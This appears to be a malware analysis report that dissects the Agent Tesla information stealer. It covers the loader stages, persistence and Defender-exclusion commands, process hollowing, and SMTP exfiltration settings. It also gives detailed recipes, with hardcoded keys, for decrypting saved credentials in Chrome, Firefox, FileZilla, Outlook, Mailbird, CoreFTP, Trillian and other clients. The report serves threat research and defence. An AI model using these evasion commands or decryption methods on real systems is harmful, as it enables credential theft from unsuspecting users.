ABSTRACT

Agent Tesla, a sophisticated malware, infiltrates

systems through phishing emails. It consists of a
multi-stage process with various droppers, its
primary goal is to extract sensitive information,
especially passwords from web browsers, email,
VPN, and FTP clients. The stolen data is emailed
to the attacker's email through compromised
servers. This report offers insights into Agent
Tesla's tactics, techniques and sub techniques.
Osama Ellahi
Unfolding Agent Tesla: The Threat Researcher
linkedin.com/in/osamaellahi/
Art of Credentials Harvesting
Analysis of Agent Tesla, A Close Look
at Password Theft Technique
Contents
Unfolding Agent Tesla: The Art of Credentials Harvesting ...............................................................0
Analysis of Agent Tesla, A Close Look at Password Theft Technique ...............................................0
Executive Summary .....................................................................................................................2
Malware Flow ...............................................................................................................................3
Malware Composition ....................................................................................................................4
Loader..........................................................................................................................................4
Persistence................................................................................................................................7
Defense Evasion .....................................................................................................................8
Injection ................................................................................................................................. 10
Final Stage .................................................................................................................................. 11
Browsers Stealing .................................................................................................................... 18
Chrome Credentials Stealing .................................................................................................. 20
Chromium bases Browser Stealing Process ................................................................................. 31
Mozilla Base Browser Stealing Process ....................................................................................... 32
System Recon collection ........................................................................................................... 32
Exfiltration .......................................................................................................................... 33
FileZilla ................................................................................................................................... 35
The BAT! EMAIL CLIENT ............................................................................................................ 37
Outlook .................................................................................................................................. 40
Trillian .................................................................................................................................... 42
Discord ................................................................................................................................... 45
MailBird .................................................................................................................................. 46
WinSCP ................................................................................................................................... 49
Core FTP LE ............................................................................................................................. 50
FLASH FXP ............................................................................................................................... 53
FTP Navigator .......................................................................................................................... 55
FTP Commander ...................................................................................................................... 56
FTP Getter ............................................................................................................................... 59
Executive Summary
Agent Tesla is a very detailed form of malware that typically infiltrates systems through deceptive emails.
Once executed, it goes through multiple stages, using various droppers to disguise its presence. The
malware's primary goal is to steal sensitive information, such as passwords, from web browsers, email,
VPN, and FTP clients. It then secretly transmits this stolen data to the attacker’s email through a
compromised email server.

This highlights the importance of being cautious with email attachments to prevent falling victim to such
malicious activities.
Malware Flow
Agent Tesla starts its malicious journey through a phishing email. The initial carrier is an {EXE} file, known
as the dropper. Inside this executable file, there is a second stage {DLL} that gets loaded into its modules.
Subsequently, a third stage {DLL} is loaded, followed by a fourth stage {DLL}. This fourth {DLL} is crucial,
as it contains the actual Agent Tesla binary, which is also an {EXE} file.

Upon execution, this fourth-stage binary extracts the Agent Tesla payload, decrypts it, and injects the
Agent Tesla binary into its own running process. In simpler terms, it activates the malicious code within
itself. The final stage binary is responsible for harvesting credentials from various sources, including
browsers, email clients, VPN clients, and FTP clients.

Once it successfully collects passwords from the system, the malware takes the next step by sending this
stolen data to the attacker's email address. To achieve this, it utilizes a compromised email server,
completing the malicious cycle initiated by the phishing email.
Malware Composition
2877f7995c2735d9f3776a49b6b28f9af850446b023821833c94581ce2b689c4

SHA256 SHA1 MD5

First 2877f7995c2735d9f3776a49b6b28f9af8 1d3e3bb92c0350076148 431c41bf81aabdb95

stage - 50446b023821833c94581ce2b689c4 ba6fc3573335aaf03a9c 77e61c7bde667ef
exe

Ben – dll bc419893a2948f85aa53af290eca67dc62 ffdd62b71859332e9cc44f febba18c6714fcec16

6ab1467b72a45419385d0fe709fd58 b673c40cf361029964 d3b1961ae8e54c

Reaction d01f3dea3851602ba5a0586c60430d286 cf6924eb360c7e5a11732 579197d4f760148a9

Diffusion adf6fcc7e17aab080601a66630606e5 3bebcb6ee02d2aec86d 482d1ebde113259
- dll

Tyrone – 8b76c98384c6c3adc45bccab7569d9c968 d9480b6ad651a8b777a9 88d10653202e2cfcd

dll 3c322c20934b03cda24c84b76fb70d 1f7dcf31652de1e03894 3e972537f3911ce

Final bc419893a2948f85aa53af290eca67dc62 2eba02407a65333a3675 7911215edc491695

Stage 6ab1467b72a45419385d0fe709fd58 b0bafda8ddd3f2f7fc99 bf598dbff6f1d0c1
{agent
tesla} -
exe

Loader
Agent tesla in this variant comes in a very famous loader which is written in c#. This loader has been
seen with so much malware like formbook, remcos and njrat etc. It have the malicious code inside the
InitializeComponent() and it is a form application.

It starts with initializing a string with obfuscated binary content.

It de-obfuscates the content by replacing "|" with "00". Then it loads the assembly by the name Ben in
modules. Ben is same obfuscated binary which it has in string JFDJ after de obfuscation, it loads in its
module for further processing.

After that it loads a second DLL ReactionDiffusion in modules extracting from resources.

And then the third DLL is loaded in modules with name of "Tyrone”. It invoke "lNeFsQJBtN()" method
from "xmUvG0atRoqU5DT6Sy.mCFjRgCR32aHEMMYFO"
It checks if the file exits "C:\Users\%username%\AppData\Roaming\kzsAJcIeUIa.exe" if it does not
exist it copies itself there. It is doing this for persistence purposes.

It changes the permission of the copied file so that no one could be able to change it or delete it.
As we can see clear difference in the following picture, the left picture shows before executing this
function and right picture was recorded after the execution. After this the user cannot delete or write
anything in the file.

Then it loads the encoded string from modules of tyrone binary and decode it. The decoded string looks
like an xml, let’s explore it further.

Persistence
This variant of agent tesla performs persistence by using task scheduler method, it runs a
PowerShell command which takes a temporary xml file that contains configuration of task.
It performs the following steps.
• loads string from modules.
• creates a new process.
 • Assign those strings to this new process as an argument.
• Make window style hidden of process.
• Start the process.

Defense Evasion

It adds an exclusion for a specific file (in this case, kzsAJcIeUIa.exe located in a user's
AppData\Roaming directory) to Windows Defender's scanning process. This command tells
Windows Defender not to scan or consider this file as a potential threat.

Powershell.exe
@"Add-MpPreference -ExclusionPath ""C:\Users\%username%\AppData\Roaming\kzsAJcIeUIa.exe"""

After that it alter information of xml and save it in tmp folder

@"C:\Users\%username%\AppData\Local\Temp\tmp95EB.tmp"

This xml contains the configuration about the persistent task. It is triggered on every Log on of user,
when user starts the system, it will execute an application which is saved in roaming.
The next command utilizes the Windows Task Scheduler tool, schtasks.exe, to create a scheduled task
named "kzsAJcIeUIa" within the "Updates" folder. The task's properties and settings are defined in an
XML file located at "C:\Users%username%\AppData\Local\Temp\tmp95EB.tmp," with %username%
serving as a placeholder for the currently logged-in user's username.

"schtasks.exe"

@"/Create /TN ""Updates\kzsAJcIeUIa"" /XML

""C:\Users\%username%\AppData\Local\Temp\tmp95EB.tmp"""

It sets the process windows style hidden to run this command in background, so that user would not see
any command pop up.
Injection

It creates read write and executable memory and then writes whole new extracted binary from
resources.

After that it injects the final stage malware in same process, this is process hollowing because a whole
binary is injected into same process.
Final Stage
The final stage is also developed in dot net (C#) and it is also obfuscated. I tried de4dot but still the final
stage was obfuscated so I continue with the debugging.
In the following figure you can see all the names are obfuscated.

At first, the xNLwYiY function is a C# method that attempts to terminate all processes with the same
name as the current process, excluding itself.
It gets all processes ids and compares with current process id if current running process id does match
then it terminates the process. It is doing this so that if it is already running then close it and remove the
repetition.
Create an instance of MD5.

The MD5.Create() method is available in the System.Security.Cryptography namespace to create an

instance of the MD5 hash algorithm.

The pFLA method attempts to retrieve the serial number of the baseboard using Windows Management
Instrumentation (WMI) and returns it; if an exception occurs during the retrieval process, it returns a
hardcoded "52b0e816-0a2b-41d9-a0e3-257276619f61" default value.
The 9KASXql5F method retrieves the processor's ID which in my case is "0FXBFBFFXX090672" using
Windows Management Instrumentation (WMI) from the "win32_processor" class and returns it; if an
exception occurs during the retrieval process, it returns a hardcoded default value.
The "array" contains the hash value of the UTF-8 encoded string "hk1TqC."
After this it stores 39 browsers and 34 endpoint client’s paths in the list.
It starts adding these password file paths. I have explained here one path of opera browser only, I will
explain further when needed.
@"C:\Users\user\AppData\Roaming\Opera Software\Opera Stable," is typically used by the Opera
web browser to store various user-specific data and settings. Here are some of the things that are
commonly stored in this directory:
• User Profile Data: Opera stores user profiles, which include bookmarks, browsing
history, saved passwords, and other browser settings in this directory. These profiles are
stored in subdirectories like "Profile" or "Profile X," where "X" represents a numerical
identifier for different profiles.
• Extensions: If you have installed extensions or add-ons in Opera, their data and settings
are typically stored in this directory.
• Cookies: Browser cookies, which are used to store website login information and
preferences, are stored in this directory.
• Cache Files: Opera stores cached web content, such as images and web pages, in this
directory to improve browsing performance.
• Session Data: Information about open tabs and sessions may also be stored in this
location, allowing Opera to restore your previous browsing session when you reopen
the browser.
• Preferences and Configuration Files: Various configuration files and settings related to
the Opera browser itself are stored in this directory.
• History: Browsing history information is stored in files within this directory.

Browsers Endpoint Clients

1. "Iridium 1. "IE/Edge"
Browser" 2. "UC Browser"
2. "Sleipnir 6" 3. "Safari for
3. "Postbox" Windows"
4. "IceDragon" 4. "Flock Browser"
5. "Citrio" 5. "Outlook"
6. "SeaMonkey" 6. "Windows Mail
7. "Edge App"
Chromium" 7. "The Bat!"
8. "Amigo" 8. "Becky!"
9. "CyberFox" 9. "IncrediMail"
10. "Firefox" 10. "Eudora"
11. "CentBrowser" 11. "ClawsMail"
12. "Kometa" 12. "FoxMail"
13. "Orbitum" 13. "Opera Mail"
14. "Thunderbird" 14. "PocoMail"
15. "Coowon" 15. "eM Client"
16. "Flock" 16. "Mailbird"
17. "K-Meleon" 17. "FileZilla"
18. "Brave" 18. "WinSCP"
19. "Torch 19. "CoreFTP"
Browser" 20. "Flash FXP"
20. "Chrome" 21. "FTP Navigator"
21. "Elements 22. "SmartFTP"
Browser" 23. "WS_FTP"
22. "Sputnik" 24. "FtpCommander"
23. "Uran" 25. "FTPGetter"
24. "IceCat" 26. "OpenVPN"
25. "Coccoc" 27. "NordVPN"
26. "Chedot" 28. "Private Internet
27. "Comodo Access"
Dragon" 29. "Discord"
28. "WaterFox" 30. "Trillian"
29. "QIP Surf" 31. "Psi/Psi+"
30. "360 Browser" 32. "MysqlWorkbench"
31. "Opera 33. "Internet
Browser" Downloader
32. "Chromium" Manager"
33. "Vivaldi" 34. "JDownloader 2.0"
34. "Cool Novo"
35. "BlackHawk"
36. "Yandex
Browser"
37. "PaleMoon"
38. "7Star"
39. "Liebao
Browser"
40. "Epic Privacy"
This function asIKdaFU handles all the credentials dumping and decryption of passwords and the
exfiltration code is also in this method.

These are some endpoint clients which you can see in the figures. It will loop through every one and
steal passwords from all of them.
Let’s start with one, let’s look at the famous browser like chrome “how agent tesla steals chrome
password”.
It loop through all the browsers and call the qDYTpM from F0hZpzhM class and pass
@"C:\Users\%username%\AppData\Local\Google\Chrome\User Data" , "Chrome" and true init as
arguments, this is the method which handle almost 27 browsers passwords decryption and stealing.
Agent tesla give user data folder of all chromium based browsers to this method and in return it
provides all the password after performing decryption.

Browsers Stealing
Agent tesla has two ways to steal browsers passwords, I have categorized them in type A which is
chromium-based browsers and type B which are Mozilla based browsers.

All type A browser stealing is almost the same. It just searches for paths if browser is installed then start
credentials harvesting and all type B has same way of stealing. So, in total there are two major functions
used for browser stealing it just send the paths and gets the credentials if browser is installed.

Type A Type B

1. @"C:\Users\%username%\ 1. @"C:\Users\%username%\App
AppData\Roaming\Opera Data\Roaming\Mozilla\Firefox\"
Software\Opera Stable" 2. @"C:\Users\%username%\App
2. @"C:\Users\%username%\ Data\Roaming\Mozilla\SeaMon
AppData\Local\Yandex\Yan key\"
dexBrowser\User Data" 3. @"C:\Users\%username%\App
3. @"C:\Users\%username%\ Data\Roaming\Thunderbird\"
AppData\Local\Iridium\Use 4. @"C:\Users\%username%\App
r Data" Data\Roaming\NETGATE
Technologies\BlackHawk\"
4. @"C:\Users\%username%\ 5. @"C:\Users\%username%\App
AppData\Local\Chromium\ Data\Roaming\8pecxstudios\Cy
User Data" berfox\"
5. @"C:\Users\%username%\ 6. @"C:\Users\%username%\App
AppData\Local\7Star\7Star\ Data\Roaming\K-Meleon\"
User Data" 7. @"C:\Users\%username%\App
6. @"C:\Users\%username%\ Data\Roaming\Mozilla\icecat\"
AppData\Local\Torch\User 8. @"C:\Users\%username%\App
Data" Data\Roaming\Moonchild
7. @"C:\Users\%username%\ Productions\Pale Moon\"
AppData\Local\MapleStudi 9. @"C:\Users\%username%\App
o\ChromePlus\User Data" Data\Roaming\Comodo\IceDrag
8. @"C:\Users\%username%\ on\"
AppData\Local\Kometa\Use 10. @"C:\Users\%username%\App
r Data" Data\Roaming\Waterfox\"
9. @"C:\Users\%username%\ 11. @"C:\Users\%username%\App
AppData\Local\Amigo\User Data\Roaming\Postbox\"
Data" 12. @"C:\Users\%username%\App
10. @"C:\Users\%username%\ Data\Roaming\Flock\Browser\"
AppData\Local\BraveSoftw
are\Brave-Browser\User
Data"
11. @"C:\Users\%username%\
AppData\Local\CentBrowse
r\User Data"
12. @"C:\Users\%username%\
AppData\Local\Chedot\Use
r Data"
13. @"C:\Users\%username%\
AppData\Local\Orbitum\Us
er Data"
14. @"C:\Users\%username%\
AppData\Local\Sputnik\Spu
tnik\User Data"
15. @"C:\Users\%username%\
AppData\Local\Comodo\Dr
agon\User Data"
16. @"C:\Users\%username%\
AppData\Local\Vivaldi\User
Data"
17. @"C:\Users\%username%\
AppData\Local\CatalinaGro
up\Citrio\User Data"
18. @"C:\Users\%username%\
AppData\Local\360Chrome
\Chrome\User Data"
 19. @"C:\Users\%username%\
AppData\Local\uCozMedia\
Uran\User Data"
20. @"C:\Users\%username%\
AppData\Local\liebao\User
Data"
21. @"C:\Users\%username%\
AppData\Local\Elements
Browser\User Data"
22. @"C:\Users\%username%\
AppData\Local\Epic Privacy
Browser\User Data"
23. @"C:\Users\%username%\
AppData\Local\CocCoc\Bro
wser\User Data"
24. @"C:\Users\%username%\
AppData\Local\Fenrir
Inc\Sleipnir5\setting\modul
es\ChromiumViewer"
25. @"C:\Users\%username%\
AppData\Local\QIP
Surf\User Data"
26. @"C:\Users\%username%\
AppData\Local\Coowon\Co
owon\User Data"
27. @"C:\Users\%username%\
AppData\Local\Google\Chr
ome\User Data"

Chrome Credentials Stealing

To make our environment ready, Let’s save two passwords in chrome browser to test.

First it initializes the path which contains login data path of chrome browser.
Note: Chromium bases browsers store all its credentials in login data file, it is SQLite file. But the
passwords are encrypted so no exploit can just steal them.

@"C:\Users\%username%\AppData\Local\Google\Chrome\User Data\Login Data":

o This path points to the "Login Data" file in the "User Data" folder of your
Chrome profile.
o The "User Data" folder is where Chrome stores various user-specific data,
including bookmarks, history, passwords, and other settings.
o The absence of the "Default" subfolder in this path suggests that it may be
associated with a non-default Chrome profile.
@"C:\Users\%username%\AppData\Local\Google\Chrome\User Data\Default\Login Data":
o This path points to the "Login Data" file in the "Default" subfolder of the "User
Data" folder.
o The "Default" subfolder is typically the main profile folder for Google Chrome. It
contains the user's primary browsing data.
It checks for paths if browser is installed or not in the system.

If the directory exists it goes further for enumeration. It gets all the subfolder from the directory to
check for password db file.

Passwords are stored in login data file with, this file has no extension like “.db” or “.sql”. It is sqlite file
but all chromium based browser save it like this “login data”.
Then it reads the login data file. Login Data means a unique combination of the User's name and a
password chosen by the User, stored by the User in a database of the Application, established
when creating a User's account through the Application, and/or the User's password
automatically generated by the Application.

Login data is a SQLite file so agent tesla fetches all the tables from it.
It targets three things, hostname, username, and password.

It fetches the origin username and password.

After getting plain origin, username, and encrypted password. It has two checks for opera it has slightly
different way, for rest of browser it uses typical way. Since we are testing it on chrome so we will
continue to other than opera browser.

After getting the encrypted password, agent tesla then requires a key to decrypt this password. All
chromium-based browsers saved their encrypted password in the \Local State file. Agent tesla perform
regular expression to fetch the key. This local state is a Json file, so we only need to get the value of
“encrypted_key”.
Lest explore the local state file and see the agent tesla’s Regex on encrypted_key.

Agent Tesla fetches the encrypted_key successfully from local sate after regex as you can see in value.
It then first decode it using base64 encoding.

The expression array.Length - 6 + 1 calculates the length of array3 to be 1 element longer than the
original array and excludes the first 6 elements from the original array. This essentially creates a new
array starting from the 7th element of the original array. In simple words it remove the DPAPI from
starts and give it to Protected.Unprotect. It use DPAPI of the current user to decrypt the encrypted_key.

Typical use cases for ProtectedData.Unprotect include:

 • Storing and protecting sensitive information like passwords or private keys in
application settings or configuration files.
• Safeguarding user-specific data, such as browser cookies, saved passwords, or tokens.
• Securing data that needs to be stored on disk or transmitted over a network in an
encrypted form.

After decrypting the encrypted_key this key is used with DPAPI to decrypt the encrypted password.
After this this the plain password is fetched in array and returned. The main code converts the byte
array to string and gets plain string password.
Then it appends these four details in list.
After running a full scan and enumeration of browsers it has these 5 passwords from my test
environment.

Chromium bases Browser Stealing Process

Let’s collect our thoughts and list down all the main steps.
Agent tesla
1. Read the origin, username, and encrypted password from login data of
chromium-based browser which is SQLite file.
2. Read encrypted_key from User data file which is JSON file using the regex.
3. Decoded the encrypted_key from base64, removed “DPAPI” keyword from start
and decrypt this key using windows DPAPI method of the current user.
4. Then this key is decrypted key and is used in DPAPI to decrypt the encrypted
password.
Mozilla Base Browser Stealing Process

1. The code retrieves encrypted usernames and passwords from Firefox's "logins.json" file, which is
the definitive source of login-related data.
2. To decrypt the stored passwords, the code relies on the Network Security Services (NSS) library,
and it specifically utilizes the PK11SDR_Decrypt function from the "nss3.dll" library.
3. NSS is a comprehensive library designed to handle secure cryptographic operations, and the
specifics of the encryption algorithm are managed internally by NSS for the sake of security and
reliability.

System Recon collection

Then it adds all the enumerators to the list and get it ready for exfiltration.

It fetches these details from system using "vVwoRiXJKOu" and from rsrz("PW") it fetches
"PW_Username_Desktopname" and then merge the passwords with this information.
• Time
• User Name
• Computer Name
• OSFullName
• CPU
• RAM

"Time: 01/03/2024 05:41:35<br>User Name: %username%<br>Computer Name: DESKTOP-

002IHON<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: 12th Gen Intel(R) Core(TM) i7-
12700KF<br>RAM: 8191.05 MB<br> <hr>Host: https://host.com/<br>Username:
username<br>Password: pass<br>Application: Chrome<br><hr>Host: https://test.com/<br>Username:
usernameoftest<br>Password: hyhello<br>Application: Chrome<br><hr>Host:
https://outlook.com/<br>Username: user<br>Password: pass<br>Application: Edge
Chromium<br><hr>Host: https://host.com/<br>Username: username<br>Password:
pass<br>Application: Edge Chromium<br><hr>Host: https://test.com/<br>Username:
usernameoftest<br>Password: hyhello<br>Application: Edge Chromium<br><hr>"

Exfiltration
Then it prepares mail object for sending the data to attacker's email, it have saved the attacker's email
hardcoded in it which is {[email protected]}

Then it set the sending email address picked from hardcoded variable.

Then it sets the subject to the system identifier. Which is PW_username/desktopname

Then it sets the html body with the data which has system information and system passwords.

Then it initializes smtpclient and configures the options of client and then send the email to attacker's
email.

smtpClient.Host: "mail.elec-qatar.com"
smtpClient.Credentials.Domain : ''"
smtpClient.Credentials.Password : *************
smtpClient.Credentials.UserName : [email protected]
smtpClient.Port : 0x0000024B which is 587
smtpClient.UseDefaultCredentials : false;
smtpClient.EnableSsl = false
smtpClient.Server : mail.elec-qatar.com
After Sending the email it disposes the attachment for memory. To clear the system loot.

Then it checks for the flag of keylogger and screen keylogger, there is full keylogger implementation
coded in it but since the flag was not set in this variant so I will not patch it and analyze or maybe if you
request me to analyze it ;)

FileZilla

Let's set up client accounts to see how it steals client applications data.
Let's test FileZilla, I tried a dummy account which does not exist just for testing purposes.

Agent Tesla initiates its search within the appdata\Roaming\filezila\recentserver.xml file. Upon manual
inspection of this file, all credentials were found stored without encryption. The lack of encryption
suggests that the process of stealing these credentials would likely be straightforward.
The exploit conducts a search for the pattern "<Pass encoding="base64">","</Pass>" within the XML
file. Upon identifying this pattern, it proceeds to read the corresponding value and performs base64
decoding to obtain the plaintext password. Subsequently, the process advances to the next set of
credentials if FileZilla has stored any additional credentials.
The BAT! EMAIL CLIENT

The BAT! is a versatile and highly customizable email client for Windows that offers a wide range of
advanced features. Known for its robust security options, it supports encryption methods like PGP,
S/MIME, and TLS/SSL, ensuring email privacy. With powerful filtering and sorting capabilities, integrated
calendar and task list, multi-account support, and anti-phishing protection, The BAT! provides efficient
email management and enhanced productivity. Its user-friendly interface, RSS reader, and backup
options make it a reliable choice for individuals and businesses alike, offering comprehensive email
solutions while allowing users to tailor the client to their specific needs.

For testing I logged in a test account of outlook to see the behavior of exploit

It loops through all the directories of appdata/The Bat and search for Account.CFN init,
Then read all lines in to an array, after that it search for “zzz" in line to perform action.

The wrMbNDi function in C# appears to be a custom encoding or decoding routine. It processes a given
input string (RfAY), ensuring it has a length that's a multiple of four. The function iterates over this
string, using a predefined character set (text) for some sort of mapping or lookup. It then performs
bitwise operations to transform groups of characters into byte values, which are stored in an array. This
array is further processed by an external, undefined method (uOdpEZr6.LmAzRa). Finally, the function
constructs and returns a new string by XORing the processed bytes with the number 90 and converting
them to characters.
At the end it was not able to fetch credentials because The BAT has updated their password storing
maybe because I perform test on latest The BAT client.
It was only able to fetch smtp server, email.

Our next target is Incredimail, how agent tesla steals the credentials of inceredimail.
By debugging the code it shows that incredimail stores its credentials in registry
{Computer\HKEY_CURRENT_USER\SOFTWARE\IncrediMail\Identities\{606C1F46-9FD0-483F-A6E6-
A7688EFCFC58}\Accounts_New\{29CAE6CD-D275-45C7-8EF6-E3265CD0D2B2}} every incredimail will
have different identities.
There is only pop password which was not clear text so lets see how it fetch the password.
First it checks id there is poppassword or smtppassword exist in registry then it fetch the value of it and
perform processing.
array2 = new byte[] { 185, 2, 250, 1 };
This array2 is static key which incredimail use to encrypt its passwords.

C# method exE performs bitwise XOR operations between elements of two byte arrays, array2 and
popPassword, and stores the results in a new byte array named array. It was complex to understand it
so I patch it and update the code with clean logic for XOR.

At the end we have these credentials.

Outlook

For outlook first it searches for these registries

• Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles
• Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles
• Software\\Microsoft\\Office\\14.0\\Outlook\\Profiles
• Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles
• Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\
Profiles.
• Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B8
8A00104B2A6676.
• Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles

Outlook usually saves its credentials in these paths, but the passwords are encrypted.

So, exploit first loop through all the nested paths and search if Email or password key exist then it
fetches id IMAP, POP3, HTTP or SMTP have some value then it retrieves it.
The zN5gmIdWTqM process the passwords, it calls the hmUn method from the Program class to decrypt
the byte array and ultimately returns the processed string. The hmUn method decrypts a byte array
using the Data Protection API and converts the result to a UTF-8 encoded string, returning it. The overall
purpose and context of this code may involve secure data manipulation or encryption/decryption
routines, with specific details depending on the broader application.

It loops through all paths and get credentials. After this it adds credentials to list and move to next
client.
Trillian
Trillian is easy-to-use, HIPAA-compliant instant messaging for people, business, and healthcare. Send
messages, share files, and much more!

First it checks for accounts.dat file which is encrypted in

appdata\Roaming\Trillian\Users\global\accounts.dat.

Secondly, it decrypts all the file data with DPAPI of current user. This time the full file is being Decrypted
using DPAPI, other clients use this DPAPI on passwords only.
But still there is another layer of password protection present. The password looks base64 let's see how
agent tesla process it to clean text.

It saves all the data in the array, and loops through the array to arrange all the credentials.
Trilliun uses this key to decrypt the password.
byte[] array2 = new byte[]
{
243, 38, 129, 196, 57, 134, 219, 146, 113, 163,
185, 230, 83, 122, 149, 124, 0, 0, 0, 0,
0, 0, byte.MaxValue, 0, 0, 128, 0, 0, 0, 128,
128, 0, byte.MaxValue, 0, 0, 0, 128, 0, 128, 0,
128, 128, 0, 0, 0, 128, byte.MaxValue, 0, 128, 0,
byte.MaxValue, 0, 128, 128, 128, 0, 85, 110, 97, 98,
108, 101, 32, 116, 111, 32, 114, 101, 115, 111,
108, 118, 101, 32, 72, 84, 84, 80, 32, 112,
114, 111, 120, 0
};
This is a hardcoded key to decrypt the hex decoded after base64 decoded text, which was decrypted
from DPAPI, At the end it performs bitwise XOR from this array2 and gets the plain text. But the last
character was missing in password which is "3" so maybe it's because of update or something.
Discord
Regex.Matches(text, "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}"): This line is searching within text for a pattern
that seems to resemble a token or a specific formatted string. The pattern is three groups of
alphanumeric characters (including hyphen -), separated by periods, with lengths of 24, 6, and 27
characters respectively.
Regex.Matches(text, "mfa\\.[\\w-]{84}"): This line looks for a pattern starting with "mfa." followed by 84
alphanumeric characters (including hyphen -). This also appears to be a specific token or key format.

C:\Users\%username%\AppData\Roaming\discord\Local Storage\leveldb\*.log
C:\Users\%username%\AppData\Roaming\discord\Local Storage\leveldb\*.ldb

Since it could not find these regex on new discord version that sway the version of agent tesla could not
extract the credentials.
MailBird
MailBird is a popular email client for Windows operating systems. It's designed to help users
manage their email accounts from various providers in one centralized application. MailBird
offers a unified inbox, which means you can access and manage emails from multiple email
accounts (such as Gmail, Outlook, Yahoo, and more) within a single interface.

Agent Tesla, a type of information-stealing malware, initiates its operations by targeting the directory
path "appdata\local\mailbird\store.db," which is the location where important login credentials are
stored within the MailBird email client.

The malware employs two static arrays as cryptographic keys to decrypt the passwords stored within
the MailBird email client's database.
These arrays are defined as follows:
array = new byte[]
{
53, 224, 133, 48, 138, 109, 145, 163, 150, 95,
242, 55, 149, 209, 207, 54, 113, 222, 126, 91,
98, 56, 213, 251, 219, 100, 166, 75, 211, 90,
5, 83
};
array2 = new byte[]
{
152, 15, 104, 206, 119, 67, 76, 71, 249, 233,
14, 130, 244, 107, 76, 235
};
These static arrays serve as keys to decrypt the stored passwords within the database by Agent Tesla.
Once decrypted, the malware proceeds to extract data from the 'Accounts' table within the MailBird
database.
Agent Tesla, after successfully accessing the 'Accounts' table within the MailBird email client's database,
retrieves the following columns of data:

• "Server_Host": This likely contains information about the email server's hostname or address.
• "Username": This column stores the usernames or email addresses associated with the
respective email accounts.
• "EncryptedPassword": In this column, the passwords are stored in an encrypted format. These
encrypted passwords are encoded using Base64.
It uses a specific method to prepare variables for decryption, employing "array" as the primary key and
"array2" as the second initialization vector (IV) key for Rijndael encryption. It's worth noting that the
encryption keys are static and come bundled with software, which makes it possible for the malware to
decrypt the passwords using these predefined keys. This method allows Agent Tesla to access and reveal
the passwords stored in the MailBird email client's database, as it knows the encryption keys required
for decryption.

Rijndael, now known as the Advanced Encryption Standard (AES), is a highly secure and efficient
symmetric key block cipher algorithm used for data encryption. It supports key sizes of 128, 192, and
256 bits and has become a global standard for securing sensitive information in various applications. Its
strength lies in its combination of substitution and permutation operations across multiple rounds,
making it resistant to cryptographic attacks.

After successfully decrypting and extracting the credentials (including "Server_Host," "Username," and
"EncryptedPassword") from the MailBird email client's database, Agent Tesla appends these credentials
to a list. If there are multiple sets of credentials present in the database table, the malware also stores
these additional sets of credentials in the same list.
WinSCP

WinSCP (Windows Secure Copy) is a popular and free open-source SFTP (SSH File Transfer Protocol), FTP
(File Transfer Protocol), WebDAV, and SCP (Secure Copy Protocol) client for Windows operating systems.

Winscp saves its credentials in the following registry.

Computer\HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Agent Tesla goes through this registry path and gets all sub-paths which are accounts that are saved in
WinSCP.

Agent Tesla, once it successfully retrieves the saved account configurations from the WinSCP registry
path, collects the following values and stores them in a list for exfiltration:
1. HostName: This typically represents the hostname or IP address of the remote server to which
the WinSCP session is configured to connect.
2. UserName: This is the username associated with the account used to log in to the remote
server.
3. Password: Agent Tesla extracts the password associated with the WinSCP session. This password
may be stored in an encrypted or obfuscated form.
4. PortNumber: The port number is the network port used for the connection to the remote
server, and it is also gathered by the malware.
Core FTP LE

CoreFTP LE is a freeware secure FTP client for Windows, notable for its comprehensive range of features
while maintaining a user-friendly interface. This software is well-suited for both personal and
professional use, offering an efficient and secure way to transfer files over the internet.
It starts looking at this following registry.
{HKEY_CURRENT_USER\SOFTWARE\FTPWare\COREFTP\Sites}
It loops through all the sub paths and investigate it.

Agent Tesla retrieves the following values from the targeted source:
1. "PW" (Password): This value typically contains the password, which is encrypted using Rijndael
encryption.
2. "User" (User): This value contains the username in plaintext, without encryption.
3. "Host" (Host): This value contains the hostname or IP address in plaintext, without encryption.
4. "Port" (Port): This value contains the port number in plaintext, without encryption.
By extracting these values, Agent Tesla obtains both the encrypted password and the necessary login
information (username, hostname, and port number) required for unauthorized access to CORE FTP LE.

• CoreFTP LE employs a fixed encryption key to encrypt and store passwords securely in the
Windows Registry.
• An exploit takes advantage of this static encryption key, "hdfzpysvpzimorhk," to decrypt
passwords retrieved from the Registry. It uses the Rijndael encryption algorithm, with an empty
 IV (Initialization Vector) containing padding zeros, to perform the decryption. This key is
hardcoded in software.

After successfully decrypting the password using the static encryption key "hdfzpysvpzimorhk" and the
specified decryption method, the exploit retrieves the decrypted password in plain text. It then adds this
plaintext password to a list for collection. The exploit continues its process to gather additional sets of
credentials or passwords, potentially compromising the security of multiple accounts.
Tip for reverse engineering!
If you are reverse engineering, it there will be an exception occurring at fetching port because of (string).
Try patching it by hardcoding return obj value in GetValue internalGetValue () and it works fine.

FLASH FXP
FlashFXP is a popular commercial FTP (File Transfer Protocol) client for Windows. It is used for
transferring files between a local computer and a remote server or between two remote servers.
FlashFXP provides a user-friendly interface and supports various FTP protocols and secure file transfer
options, such as FTPS (FTP Secure) and SFTP (SSH File Transfer Protocol).
It starts by looking at the path @"C:\ProgramData\FlashFXP\\5\quick.dat

It reads all the text from file which is plane only password is encrypted.
The passwords look encrypted, but it uses very unique way of key.

• The encryption key for decrypting the password is generated based on a combination of time
and IP address, as indicated by the "[time + ip]" reference in the "quick.dat" file.
• To decrypt the password, the exploit performs a bitwise XOR operation with the encrypted
password, resulting in the extraction of the password in plaintext.

This method suggests a unique and specific approach to password decryption, where the key is
dynamically generated based on time and IP address, and the XOR operation is used for
decryption. Understanding such encryption methods is crucial for security professionals to
assess potential vulnerabilities and protect against unauthorized access or data breaches.
FTP Navigator
FTP Navigator is a software application that is used for managing and transferring files over the File
Transfer Protocol (FTP) and related protocols like FTPS (FTP Secure) and SFTP (SSH File Transfer
Protocol). It is designed to provide an intuitive and user-friendly interface for users to connect to remote
servers, navigate their directory structures, upload, and download files, and perform various file
management tasks.

